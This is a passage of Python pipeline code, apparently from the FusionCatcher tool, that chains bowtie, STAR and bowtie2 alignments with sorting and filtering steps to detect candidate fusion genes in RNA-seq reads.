job.link(outdir('reads-ids_clip_star_psl_unmapped_filtered_2.fq'), outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'), temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_r2.fq'),temp_path=temp_flag) job.add(_SK_+'seqtk',kind='program') job.add('subseq',kind='parameter') job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('reads-refs_clip_star_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-bowtie_star.fa'),kind='output') job.run() job.add(_BE_+'bowtie-build',kind='program') if bowtie121: job.add('--threads',options.processes,kind='parameter') job.add('-f',kind='parameter') job.add('--quiet',kind='parameter') # job.add('--ntoa',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','5',kind='parameter') #job.add('',outdir('gene-gene.fa'),kind='input') job.add('',outdir('gene-gene-bowtie_star.fa'),kind='input',temp_path=temp_flag if options.skip_ig_star and eporcrlf2igh == False else 'no') job.add('',outdir('gene-gene-bowtie_star/'),kind='output',checksum='no') job.add('',outdir('gene-gene-bowtie_star/'),kind='output',command_line='no') job.run() # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') job.add('-v',options.mismatches,kind='parameter') job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') if options.ff_tryhard: job.add('--tryhard',kind='parameter') job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('--un',outdir('reads-ids_clip_star_psl_unmapped.fq'),kind='output',checksum='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_1.fq'),kind='output',command_line='no') # unmapped reads job.add('--un',outdir('reads-ids_clip_star_psl_unmapped_2.fq'),kind='output',command_line='no') # unmapped reads job.add('--max',outdir('reads-ids_clip_star_psl_max.fq'),kind='output',temp_path=temp_flag) # if this is missing then these reads are going to '--un' job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('',outdir('gene-gene-bowtie_star/'),kind='input') job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_filtered_1_t.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_filtered_2_t.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star.sam'),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star.sam'),kind='output') job.run() job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star.sam'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_patch.sam'),kind='output') job.run() job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.sam'),kind='input',temp_path=temp_flag) #job.add('--output',outdir('split_gene-gene_star_patch.psl'),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_patch.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_patch.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_final.psl'),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_star_psl_unmapped_1.fq')) or eporcrlf2igh == False,id = "#reads-ids_clip_star_psl_unmapped_1#"): job.clean(outdir('reads-ids_clip_star_psl_unmapped_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_2.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_uniq.txt'),temp_path=temp_flag) job.clean(outdir('gene-gene-bowtie_star/'),temp_path=temp_flag) job.clean(outdir('gene-gene-bowtie_star.fa'),temp_path=temp_flag) else: ########################################################## # unmapped reads are mapped again by allowing a gap is allowed in their alignment ########################################################## # extract reads ids job.add('LC_ALL=C',kind='program') job.add('awk',kind='parameter') job.add("""'NR%4==1 {print substr($0,2,index($0,"__")-2)}'""",outdir('reads-ids_clip_star_psl_unmapped_1.fq'),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add(_SK_+'seqtk',kind='parameter') job.add('subseq',kind='parameter') #job.add('',outdir('reads-ids_clip_star_psl.fq'),kind='input',temp_path=temp_flag) if options.trim_psl_3end_keep < max_len_reads and (not options.skip_extension): job.add('',outdir('original_important.fq.gz'),kind='input') job.add('-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'trim_poly_tails.py',kind='parameter') job.add('--input','-',kind='parameter') job.add('--repeats',length_anchor_minimum - 1,kind='parameter') # 12 job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add(_FC_+'clip_quality.py',kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('-t',options.trim_quality,kind='parameter') # below Q5 trimming starts job.add('--score-type','sanger',kind='parameter') job.add('--input','-',kind='parameter') job.add('--output',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='output') else: job.add('',outdir('reads-ids_clip_star_psl.fq'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='output') job.run() job.clean(outdir('reads-ids_clip_star_psl.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_1.fq'),temp_path=temp_flag) job.clean(outdir('reads-ids_clip_star_psl_unmapped_2.fq'),temp_path=temp_flag) job.add(_FC_+'split-reads.py',kind='program') job.add('--input',outdir('reads-ids_clip_star_psl_unmapped_x.fq'),kind='input',temp_path=temp_flag) job.add('--list',outdir('reads-ids_clip_star_psl_uniq.txt'),kind='input',temp_path=temp_flag) job.add('--output-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='output') job.add('--output-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='output') job.add('--wiggle-size',options.gap_wiggle_size,kind='parameter') job.add('--gap-size',options.length_gap,kind='parameter') job.add('--anchor-size',options.length_anchor_gap,kind='parameter') job.add('--anchor-size-max',options.length_anchor_gap_max,kind='parameter') job.add('--buffer-size',options.extract_buffer_size,kind='parameter',checksum='no') if not options.skip_ig_star: job.add('--output-2-rc',kind='parameter') job.add('--replace-solexa-ids','=',kind='parameter') job.run(error_message = ("If this fails due to a memory error then lowering the "+ "buffer size (to 50% or 25%) using the command line option --extra-buffer-size "+ "of FusionCatcher and running it again might help!")) if options.skip_ig_star: job.clean(outdir('gene-gene-bowtie_star.fa'),temp_path=temp_flag) # map using bowtie job.add(_BE_+'bowtie',kind='program') job.add('--seed',bowtie_seed,kind='parameter') if bowtie121: job.add('--no-unal',kind='parameter') job.add('-t',kind='parameter') #job.add('-q',kind='parameter') #job.add('-a',kind='parameter') job.add('-k','500',kind='parameter') #job.add('-v',options.mismatches,kind='parameter') job.add('-v',options.mismatches+1,kind='parameter') # 2 here is not enough for IGH!!!! job.add('-p',options.processes,kind='parameter',checksum='no') if os.path.isfile(os.path.join(outdir('gene-gene-bowtie_star'),'.1.ebwtl')): job.add('--large-index',kind='parameter') job.add('--chunkmbs',options.chunkmbs,kind='parameter',checksum='no') ##job.add('--tryhard',kind='parameter') #???? job.add('--best',kind='parameter') job.add('--strata',kind='parameter') job.add('--sam',kind='parameter') job.add('--ff',kind='parameter') job.add('-X',outdir('gene-gene_longest.txt'),kind='parameter',from_file="yes") job.add('',outdir('gene-gene-bowtie_star/'),kind='input',temp_path=temp_flag) job.add('-1',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='input',temp_path=temp_flag) job.add('-2',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='input',temp_path=temp_flag) if bowtie121: job.add('',outdir('split_gene-gene_star_unmapped.sam'),kind='output') job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) else: job.add('2>',outdir('log_bowtie_reads_mapped-gene-gene-star-unampped.stdout.txt'),kind='output',checksum='no',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('awk',"""'$3 == "*" { next } { print }'""",kind='parameter') job.add('>',outdir('split_gene-gene_star_unmapped.sam'),kind='output') job.run() else: job.clean(outdir('gene-gene-bowtie_star/'),temp_path=temp_flag) # job.add('du',kind='program') # job.add('-b',outdir('gene-gene-bowtie_star.fa'),kind='input') # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('cut',kind='parameter') # job.add('-f','1',kind='parameter') # job.add('>',outdir('gene-gene2__nuc.txt'),kind='output') # job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-v','"^>"',kind='parameter') job.add('',outdir('gene-gene-bowtie_star.fa'),kind='input') job.add('|',kind='parameter') job.add('wc',kind='parameter') job.add('|',kind='parameter') job.add('awk',kind='parameter') job.add("'{print $3-$1}'",kind='parameter') job.add('>',outdir('gene-gene2__nuc.txt'),kind='output') job.run() nucleotides2_gg = int(float(file(outdir('gene-gene2__nuc.txt'),'r').readline().strip())) job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-c',kind='parameter') job.add("'^>'",outdir('gene-gene-bowtie_star.fa'),kind='input') job.add('>',outdir('gene-gene2__seq.txt'),kind='output') job.run(successful_exit_status=(0,1)) sequences2_gg = int((file(outdir('gene-gene2__seq.txt'),'r').readline().strip())) genomesaindexnbases2 = int(min(14, math.log(nucleotides2_gg,2)/(float(2)) - 1)) genomechrbinnbits2 = int(min(18, math.log(float(nucleotides2_gg)/float(sequences2_gg),2))) # build the STAR index job.add(_SR_+'STAR',kind='program') job.add('--genomeChrBinNbits',genomechrbinnbits2,kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--runMode','genomeGenerate',kind='parameter') if star25: job.add('--genomeSuffixLengthMax','10000',kind='parameter') # for STAR 2.5.x job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--genomeDir',outdir('gene-gene-bowtie_star2/'),kind='output') job.add('--genomeFastaFiles',outdir('gene-gene-bowtie_star.fa'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-bowtie_star2_results/'),kind='output',temp_path=temp_flag) job.run() # align the unmapped reads using STAR on candidate fusion gene-gene # idea: --alignEndsType Extend5pOfRead1 --outFilterMismatchNmax 0 --seedSearchStartLmax 999 mirna = False job.add(_SR_+'STAR',kind='program') job.add('--runRNGseed','54321',kind='parameter') #job.add('--twopass1readsN','-1',kind='parameter') #job.add('--twopassMode','Basic',kind='parameter') job.add('--genomeSAindexNbases',genomesaindexnbases2,kind='parameter') job.add('--alignIntronMax',outdir('gene-gene_longest.txt'),kind='parameter',from_file = 'yes') job.add('--outFilterMatchNmin',length_anchor_star-1,kind='parameter') # 17 job.add('--outSAMattributes','NM',kind='parameter') # 'NM' ==> NM is different than nM job.add('--outFilterMatchNminOverLread','0.80',kind='parameter') job.add('--outFilterScoreMinOverLread','0.80',kind='parameter') # NEW in v0.99.4b job.add('--alignSplicedMateMapLminOverLmate','0.80',kind='parameter') # NEW in v0.99.4b if star25: job.add('--alignSJstitchMismatchNmax','5 -1 5 5',kind='parameter')# default is: 0 -1 0 0 # added in STAR 2.5.x job.add('--genomeDir',outdir('gene-gene-bowtie_star2/'),kind='input',temp_path=temp_flag) job.add('--runThreadN',options.processes,kind='parameter',checksum='no') job.add('--limitOutSAMoneReadBytes','100000000',kind='parameter') job.add('--alignTranscriptsPerReadNmax','500000',kind='parameter') # if this is missing STAR crashes in some cases job.add('--scoreGap','-10000',kind='parameter') if not mirna: job.add('--alignEndsType','EndToEnd',kind='parameter') # disable soft clipping job.add('--seedSearchStartLmax',length_anchor_star-1,kind='parameter')# default is: 50 else: #job.add('--alignEndsType','Extend5pOfRead1',kind='parameter') # behaves like a miRNA alignment job.add('--alignEndsType','EndToEnd',kind='parameter') # behaves like a miRNA alignment job.add('--seedSearchStartLmax','999',kind='parameter')# default is: 50 job.add('--readFilesIn',outdir('reads-ids_clip_star_psl_unmapped_s_1.fq'),kind='input',temp_path=temp_flag) job.add('',outdir('reads-ids_clip_star_psl_unmapped_s_2.fq'),kind='input',temp_path=temp_flag) job.add('--outFileNamePrefix',outdir('gene-gene-star-results-unmapped/'),kind='output') job.run() job.link(outdir('gene-gene-star-results-unmapped','Aligned.out.sam'),outdir('split_gene-gene_star_unmapped.sam'),temp_path=temp_flag) job.add(_FC_+'merge-sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped.sam'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_patch.sam'),kind='output') #job.add('--mismatches-long',options.mismatches+1,kind='parameter') job.add('--mismatches-long',options.mismatches_gap,kind='parameter') job.add('--mismatches-short',options.mismatches,kind='parameter') if not options.skip_ig_star: job.add('--forward-reverse',kind='parameter') job.run() job.clean(outdir('gene-gene-star-results-unmapped/'),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.sam'),kind='input',temp_path=temp_flag) if not options.skip_ig_star: job.add('--replace-read-ids','=',kind='parameter') #job.add('--output',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='output') job.add('--output','-',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_patch.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('split_gene-gene_star_unmapped_final.psl'),kind='output') job.add('--remove-extra',kind='parameter') job.run() if job.iff(empty(outdir('split_gene-gene_star_final.psl')),id = "#split_gene-gene_star_final#"): job.link(outdir('gene-gene-star.psl'), outdir('gene-gene-star_more.psl'), temp_path=temp_flag) job.clean(outdir('split_gene-gene_star.psl'),temp_path=temp_flag) else: job.add('cat',kind='program') job.add('',outdir('split_gene-gene_star_final.psl'),kind='input',temp_path=temp_flag) job.add('',outdir('gene-gene-star.psl'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_more.psl'),kind='output') job.run() # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('gene-gene-star_more.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-star_best-unique.psl'),kind='output') # if (not empty(outdir('candidate_fusion-genes_further_mark.txt'))) and (not empty(datadir('custom_genes.txt'))): # job.add('--ties',datadir('custom_genes_mark.txt'),kind='input') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') job.add('--anchor',length_anchor_star,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() # more filtering -- remove the reads from the gene-gene junctions # which have the pair read mapping on a totally different gene than # those involved in the gene-gene junction if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('gene-gene-star_best-unique.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input') job.add('--output_psl',outdir('gene-gene-star_best-unique_gene_pairs.psl'),kind='output') job.run() else: job.link(outdir('gene-gene-star_best-unique.psl'), outdir('gene-gene-star_best-unique_gene_pairs.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('gene-gene-star_best-unique_gene_pairs.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',length_anchor_star,kind='parameter') job.add('--mismatches',options.mismatches_psl,kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_star7.txt'),kind='output') job.run() job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_star7.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_star.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() #eporcrlf2igh if job.iff(eporcrlf2igh and (not empty(outdir('split_gene-gene_star_unmapped_final.psl'))), id ="#split_gene-gene_star_unmapped_final.psl#"): # find the best unique alignments of reads job.add(_FC_+'psl_best_unique_contigs.py',kind='program') job.add('--input',outdir('split_gene-gene_star_unmapped_final.psl'),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-star_best-unique_.psl'),kind='output') job.add('--ties-overlappings',datadir('ensembl_overlapping_genes.txt'),kind='input') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') job.add('--anchor',length_anchor_star,kind='parameter') # find_fusion_genes_blat.py --threshold_overlap is enough! job.add('--mismatches',options.mismatches_gap,kind='parameter') job.add('--processes',options.processes,kind='parameter',checksum='no') job.add('--tmp_dir',tmp_dir,kind='output',checksum='no') job.run() job.add('LC_ALL=C',kind='program') job.add('grep',kind='parameter') job.add('-F',kind='parameter') #job.add('-f',datadir('ig_loci.txt'),kind='input') job.add('-f',datadir('gap_fusions.txt'),kind='input') job.add('',outdir('gene-gene-star_best-unique_.psl'),kind='input',temp_path=temp_flag) job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('grep',kind='parameter') job.add('-F',kind='parameter') job.add('-f',outdir('eporcrlf2.txt'),kind='input',temp_path=temp_flag) job.add('>',outdir('gene-gene-star_best-unique_2.psl'),kind='output') job.run(successful_exit_status=(0,1)) if not options.all_reads_junction: job.add(_FC_+'remove_reads_exon_exon_psl.py',kind='program') job.add('--input_psl',outdir('gene-gene-star_best-unique_2.psl'),kind='input',temp_path=temp_flag) job.add('--input_transcriptome',outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),kind='input') job.add('--output_psl',outdir('gene-gene-star_best-unique_gene_pairs_.psl'),kind='output') job.run() else: job.link(outdir('gene-gene-star_best-unique_2.psl'), outdir('gene-gene-star_best-unique_gene_pairs_.psl'), temp_path=temp_flag) job.add(_FC_+'find_fusion_genes_psl.py',kind='program') job.add('--input_mappings',outdir('gene-gene-star_best-unique_gene_pairs_.psl'),kind='input',temp_path=temp_flag) job.add('--input_genegene_fasta',outdir('gene-gene.fa'),kind='input') job.add('--input_hugo',datadir('genes_symbols.txt'),kind='input') job.add('--input_genes_positions',datadir('genes.txt'),kind='input') job.add('--threshold_overlap',options.length_anchor_gap,kind='parameter') job.add('--mismatches',options.mismatches_gap,kind='parameter') job.add('--separator','*%s' % ("N"*options.length_gap,),kind='parameter') job.add('--output',outdir('candidates_fusion_genes_reads_star_.txt'),kind='output') job.run() if job.iff(not empty(outdir('candidates_fusion_genes_reads_star_.txt')), id ="#candidates_fusion_genes_reads_star_.txt#"): job.add(_FC_+'smoothing_fusions_psl.py',kind='program') job.add('--input',outdir('candidates_fusion_genes_reads_star_.txt'),kind='input',temp_path=temp_flag) job.add('--output',outdir('candidates_fusion_genes_reads_star_2.txt'),kind='output') job.add('--wiggle','3',kind='parameter') job.run() job.add('LC_ALL=C',kind='program') job.add('sed',kind='parameter') job.add("'1d'",kind='parameter') job.add('',outdir('candidates_fusion_genes_reads_star_2.txt'),kind='input',temp_path=temp_flag) job.add("|",kind='parameter') job.add('cat',kind='parameter') job.add('',outdir('candidates_fusion_genes_reads_star.txt'),kind='input',temp_path=temp_flag) job.add('-',kind='parameter') job.add('>',outdir('candidates_fusion_genes_reads_star_last.txt'),kind='output') job.run() else: job.link(outdir('candidates_fusion_genes_reads_star.txt'), outdir('candidates_fusion_genes_reads_star_last.txt'), temp_path=temp_flag) else: job.link(outdir('candidates_fusion_genes_reads_star.txt'), outdir('candidates_fusion_genes_reads_star_last.txt'), temp_path=temp_flag) job.clean(outdir('reads_filtered_transcriptome_sorted-read_end_important.map'),temp_path=temp_flag if options.skip_bowtie2 else 'no') job.clean(outdir('gene-gene.fa'),temp_path=temp_flag if options.skip_bowtie2 else 'no') # summary of gene-gene mappings job.add(_FC_+'build_report_fusions_psl.py',kind='program') job.add('--suporting_unique_reads',spanning_reads_star,kind='parameter') job.add('--anchor2',length_anchor2,kind='parameter') job.add('--mismatches',options.mismatches_psl+1,kind='parameter') job.add('--mismatches-gap',options.mismatches_gap,kind='parameter') job.add('--input_candidate_fusion_genes_reads',outdir('candidate_fusion-genes_supporting_paired-reads.txt'),kind='input',temp_path=temp_flag if options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fastq',outdir('original_important.fq.gz'),kind='input',temp_path=temp_flag if options.skip_bowtie2 and options.skip_spotlight else 'no') job.add('--input_fusion_psl',outdir('candidates_fusion_genes_reads_star_last.txt'),kind='input',temp_path=temp_flag) job.add('--tmp_dir',tmp_dir,kind='parameter',checksum='no') if options.psl_visualization and not empty(datadir('genome.2bit')): job.add('--input_genome_2bit',datadir('genome.2bit'),kind='input') job.add('--psl_alignment_type','web',kind='parameter') if _BT_: job.add('--blat-dir',_BT_,kind='parameter') if options.sam_visualization: job.add('--input_genome_bowtie2',datadir('genome_index2/index'),kind='input') job.add('--sam_alignment','20',kind='parameter') job.add('--threads',options.processes,kind='parameter') if _B2_: job.add('--bowtie2-dir',_B2_,kind='parameter') if options.assembly: job.add('--velvet',kind='parameter') if _VT_: job.add('--velvet-dir',_VT_,kind='parameter') job.add('--output_super_summary',outdir('candidate_fusion_genes_summary_STAR.txt'),kind='output') job.add('--output_zip_fasta',outdir('supporting-reads_gene-fusions_STAR.zip'),kind='output') job.run() ################################################################################ # Bowtie2 alignment ################################################################################ if (not options.skip_bowtie2) and job.iff(not empty(outdir('reads_gene-gene_no-str.fq')), id = "#reads_gene-gene_no-str.fq-4#"): # find available memory job.add('printf',kind='program') job.add('"\n============\nMEMORY (before using Bowtie2):\n============\n"',kind='parameter') job.add('>>',info_file,kind='output') job.run() job.add('free',kind='program') job.add('-m',kind='parameter') job.add('>>',info_file,kind='output') job.run() if nucleotides_gg > options.limit_bowtie2: job.add(_FC_+'split-fasta.py',kind='program') job.add('--size',outdir('gene-gene__nuc.txt'),kind='input') job.add('--seqs',outdir('gene-gene__seq.txt'),kind='input') job.add('--threshold',options.limit_bowtie2,kind='parameter') job.add('-i',outdir('gene-gene.fa'),kind='input') job.add('-o',outdir('gene-gene_split_bowtie2.fa'),kind='output') job.add('-x',outdir('gene-gene_split_bowtie2.len'),kind='output') job.run() parts = [el.strip() for el in file(outdir('gene-gene_split_bowtie2.fa'),'r').readlines()] maxlens = [el.strip() for el in file(outdir('gene-gene_split_bowtie2.len'),'r').readlines()] for i,part in enumerate(parts): gd = "%s_bowtie2/" % (part,) gdi = "%s_bowtie2/index" % (part,) # build the BOWTIE2 index job.add(_B2_+'bowtie2-build',kind='program') job.add('-f',kind='parameter') job.add('--threads',options.processes,kind='parameter') job.add('--quiet',kind='parameter') job.add('--offrate','1',kind='parameter') job.add('--ftabchars','7',kind='parameter') job.add('',part,kind='input') job.add('',gdi,kind='output',checksum='no') job.add('',gd,kind='output',command_line='no') job.run() # align the unmapped reads using BOWTIE2 on candidate fusion gene-gene job.add(_B2_+'bowtie2',kind='program') job.add('-p',options.processes,kind='parameter',checksum='no') job.add('--phred33',kind='parameter') job.add('--no-unal',kind='parameter') job.add('--local',kind='parameter') job.add('-N','1',kind='parameter') # new job.add('-R','3',kind='parameter') # new job.add('-D','20',kind='parameter') # new job.add('-k','5',kind='parameter') job.add('-L','20',kind='parameter') job.add('-x',gdi,kind='input',checksum='no') job.add('-x',gd,kind='input',command_line='no',temp_path=temp_flag) job.add('-U',outdir('reads_gene-gene_no-str.fq'),kind='input') job.add('-S',outdir('gene-gene-bowtie2.sam.')+str(i),kind='output') job.add('2>',outdir('log_bowtie2_reads-gene-gene.stdout.txt.')+str(i),kind='output',checksum='no') job.run() job.clean(outdir('log_bowtie2_reads-gene-gene.stdout.txt.')+str(i),temp_path=temp_flag) job.add(_FC_+'sam2psl.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.sam.')+str(i),kind='input',temp_path=temp_flag) job.add('--output','-',kind='output') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('sort',kind='parameter') job.add('-k','10,10',kind='parameter') job.add('-k','14,14',kind='parameter') job.add('-k','12,12n',kind='parameter') job.add('-k','13,13n',kind='parameter') job.add('-t',"'\t'",kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('>',outdir('gene-gene-bowtie2.psl.')+str(i),kind='output') job.run() job.add(_FC_+'analyze_splits_sam.py',kind='program') job.add('--input',outdir('gene-gene-bowtie2.psl.')+str(i),kind='input',temp_path=temp_flag) job.add('--output',outdir('gene-gene-bowtie2_final.psl.')+str(i),kind='output') job.add('--clipped-reads-ids',outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),kind='output') job.add('--clipped-reads-refs',outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),kind='output') job.add('--clip-min',length_anchor_bowtie2,kind='parameter') job.run() if job.iff(empty(outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i)),id = "#reads-ids-clip-psl-bowtie2."+str(i)+"#"): job.clean(outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),temp_path=temp_flag) job.clean(outdir('reads-refs_clip_psl_bowtie2.txt.')+str(i),temp_path=temp_flag) job.clean(part,temp_path=temp_flag) else: job.add('LC_ALL=C',kind='program') job.add('sort',kind='parameter') job.add('-u',kind='parameter') if sort_buffer: job.add('--buffer-size',sort_buffer,kind='parameter',checksum='no') if sort_parallel: job.add('--parallel',options.processes,kind='parameter',checksum='no') if sort_lzop_compress: job.add('--compress-program','lzop',kind='parameter',checksum='no') elif sort_gzip_compress: job.add('--compress-program','gzip',kind='parameter',checksum='no') job.add('-T',tmp_dir,kind='parameter',checksum='no') job.add('',outdir('reads-ids_clip_psl_bowtie2.txt.')+str(i),kind='input',temp_path=temp_flag) # job.add('|',kind='parameter') # job.add('LC_ALL=C',kind='parameter') # job.add('uniq',kind='parameter') job.add('>',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='output') job.run() job.add('LC_ALL=C',kind='program') job.add('cut',kind='parameter') job.add('-f1',outdir('reads-ids_clip_bowtie2_psl_uniq.txt.')+str(i),kind='input') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') job.add('uniq',kind='parameter') job.add('|',kind='parameter') job.add('LC_ALL=C',kind='parameter') 